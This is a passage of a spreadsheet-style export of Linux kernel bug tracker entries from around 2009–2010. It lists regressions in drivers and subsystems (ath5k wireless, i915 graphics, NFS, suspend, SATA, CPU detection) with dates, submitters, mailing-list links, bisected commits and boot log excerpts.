    <t>Created attachment 24302 [details] dmesg-2.6.32.2-14.fc13.x86_64 After upgrading to the latestes stable 2.6.32.2 my atheros 2413 is useless. dmesg show the following: ath5k 0000:08:04.0: PCI INT A -&gt; GSI 21 (level, low) -&gt; IRQ 21 ath5k 0000:08:04.0: registered as 'phy0' ath5k phy0: Invalid EEPROM checksum 0xdcd7 ath5k phy0: unable to init EEPROM HDA Intel 0000:00:14.2: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 ath5k 0000:08:04.0: PCI INT A disabled ath5k: probe of 0000:08:04.0 failed with error -5 I've attached the full dmesg. The problem didn't exist with 2.6.32.1 and I found that commit 8bf3d79bc401ca417ccf9fc076d3295d1a71dbf5 is breaking my wireless. My device is: 08:04.0 Ethernet controller: Atheros Communications Inc. AR2413 802.11bg NIC (rev 01) Subsystem: AMBIT Microsystem Corp. Device 0418 Control: I/O- Mem+ BusMaster- SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 21 Region 0: Memory at c0200000 (32-bit, non-prefetchable) [size=64K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=2 PME- Kernel modules: ath5k So I'm one of those with a bogus EEPROM but what should I do? Call the Acer or what?</t>
  </si>
  <si>
    <t>Kernel configured for "586/K5/6x86/6x86MX" does not run on a Cyrix/IBM 6x86</t>
  </si>
  <si>
    <t>2009-12-26 21:36 UTC</t>
  </si>
  <si>
    <t>rm+bko</t>
  </si>
  <si>
    <t>2010-03-26 06:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 24315 [details] Config of the kernel which doesn't boot Right after starting to boot, the kernel stops and shows a message (roughly): "Expected a 586 CPU but only a 486 class CPU detected. Please use the kernel corresponding to your type of hardware". 2.6.30.9 compiled with similar options works fine. The CPU is: processor : 0 vendor_id : CyrixInstead cpu family : 4 model : 4 model name : 6x86L 2x Core/Bus Clock stepping : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : yes fpu : yes fpu_exception : no cpuid level : -1 wp : yes flags : cyrix_arr bogomips : 149.91 clflush size : 32 power management: Attaching kernel configs. Used menuconfig to select the processor type as "586/K5/6x86/6x86MX" in both cases. Result: 2.6.30.9 boots, 2.6.32.1 doesn't. Looks like CONFIG_X86_MINIMUM_CPU_FAMILY=5 could be the reason in the latter case, but (1) this didn't seem to be available in menuconfig as a separate option and (2) why wasn't this automatically set to "4" when I selected the processor type?</t>
  </si>
  <si>
    <t>acpi=ht stopped working in 2.6.32 - Asus P2B-DS not detected as SMP motherboard</t>
  </si>
  <si>
    <t>2.6.32 - 2.6.32.1 - 2.6.32.2</t>
  </si>
  <si>
    <t>2009-12-27 17:20 UTC</t>
  </si>
  <si>
    <t>Lorenzo Buzzi</t>
  </si>
  <si>
    <t>2010-02-19 04:07 UTC</t>
  </si>
  <si>
    <t>Since release 2.6.32 the Asus P2B-DS motherboard (a dual CPU board) is detected as a single CPU platform. Kernel messages report "SMP motherboard not detected" and only one CPU is listed in '/proc/cpuinfo'. Tried 2.6.32, 2.6.32.1, and 2.6.32.2 starting with a custom '.config' correctly working up to 2.6.31.9 (motherboard detected as SMP; two CPUs brought up). If needed I will post my '.config'. Regards</t>
  </si>
  <si>
    <t>suspend doesn't work on X200s</t>
  </si>
  <si>
    <t>2009-12-27 21:00 UTC</t>
  </si>
  <si>
    <t>2010-01-04 20:15 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.33-rc1 regression] suspend doesn't work on X200s Submitter : Andrew Lutomirski &lt;luto@mit.edu&gt; Date : 2009-12-22 0:45 References : http://marc.info/?l=linux-kernel&amp;m=126144274102396&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>System wakeup by time not working anymore</t>
  </si>
  <si>
    <t>2009-12-27 22:07 UTC</t>
  </si>
  <si>
    <t>2010-01-11 22:29 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] System wakeup by time not working anymore on 2.6.32 Submitter : Malte Schröder &lt;maltesch@gmx.de&gt; Date : 2009-12-03 18:06 References : http://marc.info/?l=linux-kernel&amp;m=125986362631900&amp;w=4 Notify-Also : Len Brown &lt;lenb@kernel.org&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit abd6633c67925f90775bb74755f9c547e30f1f20 Author: David Härdeman &lt;david@hardeman.nu&gt; Date: Mon Sep 21 17:04:52 2009 -0700 pnp: add a shutdown method to pnp drivers The shutdown method is used by the winbond cir driver to setup the hardware for wake-from-S5. Signed-off-by: Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Signed-off-by: David Härdeman &lt;david@hardeman.nu&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; First-Bad-Commit : abd6633c67925f90775bb74755f9c547e30f1f20</t>
  </si>
  <si>
    <t>[WMI?] boot hang</t>
  </si>
  <si>
    <t>2.6.33-rc2</t>
  </si>
  <si>
    <t>2009-12-27 22:11 UTC</t>
  </si>
  <si>
    <t>Anisse Astier</t>
  </si>
  <si>
    <t>Subject : [2.6.33-rc2] [ACPI] [WMI?] boot hang Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-12-25 10:10 References : http://marc.info/?l=linux-kernel&amp;m=126173586309724&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Deadlock regression related to NFS root</t>
  </si>
  <si>
    <t>2009-12-27 22:39 UTC</t>
  </si>
  <si>
    <t>2011-02-02 10:40 UTC</t>
  </si>
  <si>
    <t>Subject : Deadlock regression in v2.6.31.6 Submitter : "Stephen R. van den Berg" &lt;srb@cuci.nl&gt; Date : 2009-11-24 0:24 References : http://marc.info/?l=linux-kernel&amp;m=125902279909452&amp;w=4 Handled-By : Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>intel, KMS, suspend2ram resume, screen black</t>
  </si>
  <si>
    <t>2009-12-27 22:41 UTC</t>
  </si>
  <si>
    <t>2010-01-13 21:52 UTC</t>
  </si>
  <si>
    <t>Subject : intel, KMS, suspend2ram resume, screen black Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2009-11-24 4:35 References : http://marc.info/?l=linux-kernel&amp;m=125903731125558&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>REGRESSION for RT2561/RT61 in 2.6.32, related to power saving</t>
  </si>
  <si>
    <t>2009-12-27 23:05 UTC</t>
  </si>
  <si>
    <t>2010-01-11 19:50 UTC</t>
  </si>
  <si>
    <t>Subject : REGRESSION for RT2561/RT61 in 2.6.32 Submitter : Alan Stern &lt;stern@rowland.harvard.edu&gt; Date : 2009-12-06 22:12 References : http://marc.info/?l=linux-kernel&amp;m=126013756829691&amp;w=4 Handled-By : Gertjan van Wingerde &lt;gwingerde@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. A known workaround is to build the kernel with CONFIG_CFG80211_DEFAULT_PS unset.</t>
  </si>
  <si>
    <t>i915: Commit 0e442c60 causes flickering</t>
  </si>
  <si>
    <t>2009-12-27 23:09 UTC</t>
  </si>
  <si>
    <t>2010-02-07 13:19 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression] i915: Commit 0e442c60 causes flickering in 2.6.32 Submitter : David John &lt;davidjon@xenontk.org&gt; Date : 2009-12-09 17:26 References : http://marc.info/?l=linux-kernel&amp;m=126037889600769&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit 0e442c60dd39ac6924b11a20497734bd2303744c Author: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date: Mon Oct 19 10:09:33 2009 +0900 drm/i915: add FIFO watermark support for G4x Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : 0e442c60dd39ac6924b11a20497734bd2303744c</t>
  </si>
  <si>
    <t>ksoftirqd problem</t>
  </si>
  <si>
    <t>2009-12-27 23:12 UTC</t>
  </si>
  <si>
    <t>2010-02-22 18:21 UTC</t>
  </si>
  <si>
    <t>Subject : ksoftirqd problem Submitter : Nico &lt;segfault2@hotmail.com&gt; Date : 2009-12-13 19:05 References : http://marc.info/?l=linux-kernel&amp;m=126073114325690&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>reiserfs: inconsistent lock state</t>
  </si>
  <si>
    <t>2009-12-27 23:18 UTC</t>
  </si>
  <si>
    <t>2010-01-10 23:01 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc0: reiserfs: inconsistent lock state Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : 2009-12-11 22:06 References : http://marc.info/?l=linux-kernel&amp;m=126056920702515&amp;w=4 Handled-By : Frederic Weisbecker &lt;fweisbec@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/67256/ Patch : http://patchwork.kernel.org/patch/67257/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drm_i915 error</t>
  </si>
  <si>
    <t>2.6.32-git10</t>
  </si>
  <si>
    <t>2009-12-27 23:23 UTC</t>
  </si>
  <si>
    <t>2009-12-30 21:40 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Linux-2.6.32-git10 drm_i915 error Submitter : Tarkan Erimer &lt;tarkane@netone.com.tr&gt; Date : 2009-12-14 12:50 References : http://marc.info/?l=linux-kernel&amp;m=126079504930147&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bisected crash due to "x86: Move swiotlb initialization before dma32_free_bootmem"</t>
  </si>
  <si>
    <t>2009-12-27 23:27 UTC</t>
  </si>
  <si>
    <t>2009-12-30 21:42 UTC</t>
  </si>
  <si>
    <t>Subject : bisected crash due to "x86: Move swiotlb initialization before dma32_free_bootmem" Submitter : Roland Dreier &lt;rdreier@cisco.com&gt; Date : 2009-12-15 7:47 References : http://marc.info/?l=linux-kernel&amp;m=126086324302061&amp;w=4 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Boot ends not on tty1</t>
  </si>
  <si>
    <t>2009-12-27 23:31 UTC</t>
  </si>
  <si>
    <t>2010-01-10 22:28 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.32: Boot ends not on tty1 Submitter : Andreas Friedrich &lt;andreas.friedrich@ts.fujitsu.com&gt; Date : 2009-12-15 8:05 References : http://marc.info/?l=linux-kernel&amp;m=126086495304263&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>boot problem bisected to commit 99935a7a59</t>
  </si>
  <si>
    <t>2009-12-27 23:47 UTC</t>
  </si>
  <si>
    <t>2010-01-16 21:54 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel 2.66.33-rC1 boot problem bisected to commit 99935a7a59eaca0292c1a5880e10bae03f4a5e3d Submitter : Vincent ETIENNE &lt;ve@vetienne.net&gt; Date : 2009-12-19 16:07 References : http://marc.info/?l=linux-kernel&amp;m=126123946509316&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Patch : http://patchwork.kernel.org/patch/68941/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Commit "kbuild: fix bzImage build for x86" breaks build</t>
  </si>
  <si>
    <t>2009-12-27 23:51 UTC</t>
  </si>
  <si>
    <t>2010-01-14 20:35 UTC</t>
  </si>
  <si>
    <t>14848 14952 15019</t>
  </si>
  <si>
    <t>Subject : Also on x86 - was: 2.6.33-rc1: hrtimers and tickless broken on m68knommu. Submitter : Oliver Hartkopp &lt;oliver@hartkopp.net&gt; Date : 2009-12-19 19:21 References : http://marc.info/?l=linux-kernel&amp;m=126125050622195&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Caused by: commit 4a2ff67c88211026afcbdbc190c13f705dae1b59 Author: Michael Tokarev &lt;mjt@tls.msk.ru&gt; Date: Tue Oct 13 22:22:46 2009 +0200 kbuild: fix bzImage build for x86 Signed-Off-By: Michael Tokarev &lt;mjt@tls.msk.ru&gt; Signed-off-by: Sam Ravnborg &lt;sam@ravnborg.org&gt; Signed-off-by: Michal Marek &lt;mmarek@suse.cz&gt; First-Bad-Commit : 4a2ff67c88211026afcbdbc190c13f705dae1b59</t>
  </si>
  <si>
    <t>256MB CF card no longer recognized in PCMCIA slot</t>
  </si>
  <si>
    <t>2009-12-27 23:54 UTC</t>
  </si>
  <si>
    <t>2009-12-29 16:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc0 regression: 256MB CF card no longer recognized in PCMCIA slot Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-12-19 21:55 References : http://marc.info/?l=linux-kernel&amp;m=126125973632173&amp;w=4 Notify-Also : Jeff Garzik &lt;jeff@garzik.org&gt; Handled-By : Dominik Brodowski &lt;linux@dominikbrodowski.net&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pata_cmd64x broken in 2.6.33-rc1</t>
  </si>
  <si>
    <t>2009-12-27 23:59 UTC</t>
  </si>
  <si>
    <t>2009-12-29 22:43 UTC</t>
  </si>
  <si>
    <t>Subject : pata_cmd64x broken in 2.6.33-rc1 on sparc64 Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2009-12-19 22:23 References : http://marc.info/?l=linux-kernel&amp;m=126126142501594&amp;w=4 Notify-Also : linux-ide@vger.kernel.org This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Caused by: commit d43744390e460dce6626fb8de2c02a24ff650005 Author: Alan Cox &lt;alan@linux.intel.com&gt; Date: Mon Nov 30 13:22:54 2009 +0000 pata_cmd64x: implement serialization as per notes Signed-off-by: Alan Cox &lt;alan@linux.intel.com&gt; Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt; First-Bad-Commit : d43744390e460dce6626fb8de2c02a24ff650005</t>
  </si>
  <si>
    <t>Stable version 2.6.32.2 broke my KMS Radeon setup</t>
  </si>
  <si>
    <t>2009-12-28 00:02 UTC</t>
  </si>
  <si>
    <t>2012-05-14 15:38 UTC</t>
  </si>
  <si>
    <t>14937 14938</t>
  </si>
  <si>
    <t>Subject : Stable version 2.6.32.2 broke my KMS Radeon setup Submitter : Ruud Linders &lt;kernelml@xs4all.nl&gt; Date : 2009-12-20 12:02 References : http://marc.info/?l=linux-kernel&amp;m=126131105608871&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Successful resume from suspend but freezes after I/O</t>
  </si>
  <si>
    <t>2009-12-28 23:37 UTC</t>
  </si>
  <si>
    <t>2011-01-16 22:11 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED, REGRESSION] Successful resume from suspend but freezes after I/O Submitter : Volker Lanz &lt;vl@fidra.de&gt; Date : 2009-12-07 17:56 References : http://marc.info/?l=linux-kernel&amp;m=126021054931813&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 78a8b35bc7abf8b8333d6f625e08c0f7cc1c3742 Author: Yinghai Lu &lt;yinghai@kernel.org&gt; Date: Thu Mar 12 22:36:01 2009 -0700 x86: make e820_update_range() handle small range update Impact: enhance e820 code to handle more cases Try to handle new range which could be covered by one entry. Signed-off-by: Yinghai Lu &lt;yinghai@kernel.org&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 78a8b35bc7abf8b8333d6f625e08c0f7cc1c3742</t>
  </si>
  <si>
    <t>2009-12-28 23:53 UTC</t>
  </si>
  <si>
    <t>2011-02-02 09:50 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32 seemed to have broken nVidia MCP7A sata controller Submitter : Mike Cui &lt;cuicui@gmail.com&gt; Date : 2009-12-19 6:13 References : http://marc.info/?l=linux-ide&amp;m=126120323407742&amp;w=4 Handled-By : Jeff Garzik &lt;jeff@garzik.org&gt; Handled-By : Robert Hancock &lt;hancockrwd@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in 2.6.32.2: segfault on halt</t>
  </si>
  <si>
    <t>2009-12-28 23:59 UTC</t>
  </si>
  <si>
    <t>2009-12-29 21:53 UTC</t>
  </si>
  <si>
    <t>Subject : [stable] Regression in 2.6.32.2: segfault on halt Submitter : "Holger Hoffstaette" &lt;holger.hoffstaette@googlemail.com&gt; Date : 2009-12-19 15:10 References : http://marc.info/?l=linux-kernel&amp;m=126123574505069&amp;w=4 Handled-By : Mike Galbraith &lt;efault@gmx.de&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>KMS:RV370:X300 GPU lockup ('some' web-sites in Firefox)</t>
  </si>
  <si>
    <t>2009-12-29 00:12 UTC</t>
  </si>
  <si>
    <t>2010-01-26 08:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc1 - Weird hard hangs when rendering 'some' web-sites in Firefox Submitter : David &lt;david@unsolicited.net&gt; Date : 2009-12-21 21:53 References : http://marc.info/?l=linux-kernel&amp;m=126143375823340&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. [rjw: I guessed it was a Radeon KMS issue. Might be wrong.]</t>
  </si>
  <si>
    <t>sky2 panic under load</t>
  </si>
  <si>
    <t>2009-12-29 00:17 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:51 UTC</t>
  </si>
  <si>
    <t>Subject : sky2 panic in 2.6.32.1 under load Submitter : "Berck E. Nash" &lt;flyboy@gmail.com&gt; Date : 2009-12-21 23:52 References : http://marc.info/?l=linux-kernel&amp;m=126143955730347&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=126160893126548&amp;w=4 Handled-By : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Notify-Also : Michael Breuer &lt;mbreuer@majjas.com&gt; Notify-Also : Daniel Hazelton &lt;dhazelton@enter.net&gt; Notify-Also : netdev@vger.kernel.org Notify-Also : Berck Nash &lt;flyboy@gmail.com&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ucc_geth broken</t>
  </si>
  <si>
    <t>2009-12-29 00:26 UTC</t>
  </si>
  <si>
    <t>2010-01-10 22:44 UTC</t>
  </si>
  <si>
    <t>Subject : ucc_geth broken in 2.6.32 by 864fdf884e82bacbe8ca5e93bd43393a61d2e2b4 Submitter : Lennart Sorensen &lt;lsorense@csclub.uwaterloo.ca&gt; Date : 2009-12-23 17:40 References : http://marc.info/?l=linux-kernel&amp;m=126159003430429&amp;w=4 Handled-By : Anton Vorontsov &lt;avorontsov@ru.mvista.com&gt; Patch : http://patchwork.kernel.org/patch/69585/ Patch : http://patchwork.kernel.org/patch/69600/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>OOM killer unexpectedly called</t>
  </si>
  <si>
    <t>2009-12-29 12:44 UTC</t>
  </si>
  <si>
    <t>2010-01-27 19:26 UTC</t>
  </si>
  <si>
    <t>Subject : OOM killer unexpectedly called with kernel 2.6.32 Submitter : "A. Boulan" &lt;arnaud.boulan@libertysurf.fr&gt; Date : 2009-12-24 23:42 References : http://marc.info/?l=linux-kernel&amp;m=126169821317492&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel crash during boot</t>
  </si>
  <si>
    <t>2009-12-29 12:49 UTC</t>
  </si>
  <si>
    <t>2010-01-12 21:47 UTC</t>
  </si>
  <si>
    <t>Subject : kernel problem 2.6.33-rc2 Submitter : "werner" &lt;w.landgraf@ru.ru&gt; Date : 2009-12-25 5:37 References : http://marc.info/?l=linux-kernel&amp;m=126171951030608&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hd-audio0 eats 25% CPU (according to top)</t>
  </si>
  <si>
    <t>2009-12-29 12:55 UTC</t>
  </si>
  <si>
    <t>2010-08-03 12:37 UTC</t>
  </si>
  <si>
    <t>Subject : intel hda regression: 2.6.33-rc{1,2}: hd-audio0 eats 25% CPU (according to top) Submitter : Sergei Trofimovich &lt;slyich@gmail.com&gt; Date : 2009-12-25 10:21 References : http://marc.info/?l=linux-kernel&amp;m=126173644210280&amp;w=4 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; Patch : http://patchwork.kernel.org/patch/69747/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/ext4/inode.c:1063 if attempted to use non-ext4 partition with ext4</t>
  </si>
  <si>
    <t>2009-12-29 13:01 UTC</t>
  </si>
  <si>
    <t>2009-12-31 19:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc2 allergic to amanda? Submitter : Gene Heskett &lt;gene.heskett@verizon.net&gt; Date : 2009-12-26 14:13 References : http://marc.info/?l=linux-kernel&amp;m=126183682330809&amp;w=4 Notify-Also : okias &lt;d.okias@gmail.com&gt; Notify-Also : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drm: random hang with i915</t>
  </si>
  <si>
    <t>2009-12-29 13:15 UTC</t>
  </si>
  <si>
    <t>2010-02-12 23:50 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] drm: random hang since 620f378 "drm: prune modes when ..." Submitter : Arnd Bergmann &lt;arnd@arndb.de&gt; Date : 2009-12-07 17:30 References : http://marc.info/?l=linux-kernel&amp;m=126020704125723&amp;w=4 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>agpgart-amd64 not initialized</t>
  </si>
  <si>
    <t>2009-12-29 13:26 UTC</t>
  </si>
  <si>
    <t>2010-01-10 22:20 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] agpgart-amd64 not initialized in 2.6.33-rc2 Submitter : Marin Mitov &lt;mitov@issp.bas.bg&gt; Date : 2009-12-27 15:19 References : http://marc.info/?l=linux-kernel&amp;m=126192729110083&amp;w=4 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; Patch : http://patchwork.kernel.org/patch/69956/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>gkrellm no longer shows all the temperatures on thinkpad x60</t>
  </si>
  <si>
    <t>2009-12-29 13:30 UTC</t>
  </si>
  <si>
    <t>2010-10-08 18:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc2: regression: gkrellm no longer shows all the temperatures on thinkpad x60 Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-12-27 21:57 References : http://marc.info/?l=linux-kernel&amp;m=126195107005565&amp;w=4 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>nfs regression?</t>
  </si>
  <si>
    <t>2009-12-29 13:32 UTC</t>
  </si>
  <si>
    <t>2011-02-02 10:41 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32 nfs regression? Submitter : Nikola Ciprich &lt;extmaillist@linuxbox.cz&gt; Date : 2009-12-28 12:10 References : http://marc.info/?l=linux-kernel&amp;m=126200276223524&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.32.2 SATA link detect failed, 2.6.32.1 works fine</t>
  </si>
  <si>
    <t>2009-12-29 13:44 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:50 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32.2 SATA link detect failed, 2.6.32.1 works fine Submitter : fengxiangjun &lt;fengxiangjun@neusoft.com&gt; Date : 2009-12-21 11:12 References : http://marc.info/?l=linux-kernel&amp;m=126139442328314&amp;w=4 Handled-By : Tejun Heo &lt;tj@kernel.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>All kernels after 2.6.32-git10  show only 1 CPU</t>
  </si>
  <si>
    <t>2009-12-29 13:52 UTC</t>
  </si>
  <si>
    <t>2010-01-25 21:02 UTC</t>
  </si>
  <si>
    <t>Subject : All kernels after 2.6.32-git10 show only 1 CPU Submitter : Sid Boyce &lt;sboyce@blueyonder.co.uk&gt; Date : 2009-12-23 16:55 References : http://marc.info/?l=linux-kernel&amp;m=126158734326801&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>EHCI resume sysfs duplicates</t>
  </si>
  <si>
    <t>2009-12-29 14:02 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:49 UTC</t>
  </si>
  <si>
    <t>Subject : EHCI resume sysfs duplicates (was: Re: Linux 2.6.33-rc2 - Merry Christmas ...) Submitter : Borislav Petkov &lt;petkovbb@googlemail.com&gt; Date : 2009-12-26 9:36 References : http://marc.info/?l=linux-kernel&amp;m=126182020615709&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lockdep possible recursive lock in slab parent-&gt;list-&gt;rlock</t>
  </si>
  <si>
    <t>2009-12-29 14:12 UTC</t>
  </si>
  <si>
    <t>2010-01-04 20:17 UTC</t>
  </si>
  <si>
    <t>Subject : lockdep possible recursive lock in slab parent-&gt;list-&gt;rlock in rc2 Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2009-12-27 12:06 References : http://marc.info/?l=linux-kernel&amp;m=126191560531463&amp;w=4 Handled-By : Pekka Enberg &lt;penberg@cs.helsinki.fi&gt; Patch : http://patchwork.kernel.org/patch/69829/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>warning from alloc_pages_nodemask on boot -- caused by commit 78f1699659963fff97975df44db6d5dbe7218e55</t>
  </si>
  <si>
    <t>2009-12-29 19:57 UTC</t>
  </si>
  <si>
    <t>2010-01-23 19:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 24357 [details] ACPI Dump of system Running 2.6.33-rc2 shows new warning during boot. This is Asus P6T board with i7 CPU (920). I have DMA debug and lockdep turned on in config so more checking than usual. [ 1.548537] Total of 8 processors activated (42764.23 BogoMIPS). [ 1.553064] regulator: core version 0.5 [ 1.553090] Time: 17:21:29 Date: 12/29/09 [ 1.553243] NET: Registered protocol family 16 [ 1.553613] ACPI: bus type pci registered [ 1.553733] PCI: MMCONFIG for domain 0000 [bus 00-ff] at [mem 0xe0000000-0xefffffff] (base 0xe0000000) [ 1.553736] PCI: not using MMCONFIG [ 1.553738] PCI: Using configuration type 1 for base access [ 1.555326] bio: create slab &lt;bio-0&gt; at 0 [ 1.562336] ACPI: EC: Look up EC in DSDT [ 1.573083] ACPI: Executed 1 blocks of module-level executable AML code [ 1.611664] ACPI Warning: Incorrect checksum in table [OEMB] - 94, should be 8C (20091214/tbutils-314) [ 1.611698] ACPI: SSDT 00000000bf7980c0 00403 (v01 DpgPmm P001Ist 00000011 INTL 20060113) [ 1.613966] ACPI: SSDT 00000000bf7984d0 00403 (v01 DpgPmm P002Ist 00000012 INTL 20060113) [ 1.616242] ACPI: SSDT 00000000bf7988e0 00403 (v01 DpgPmm P003Ist 00000012 INTL 20060113) [ 1.618526] ACPI: SSDT 00000000bf798cf0 00403 (v01 DpgPmm P004Ist 00000012 INTL 20060113) [ 1.620817] ACPI: SSDT 00000000bf799100 00403 (v01 DpgPmm P005Ist 00000012 INTL 20060113) [ 1.623112] ACPI: SSDT 00000000bf799510 00403 (v01 DpgPmm P006Ist 00000012 INTL 20060113) [ 1.625409] ACPI: SSDT 00000000bf799920 00403 (v01 DpgPmm P007Ist 00000012 INTL 20060113) [ 1.627734] ACPI: SSDT 00000000bf799d30 00403 (v01 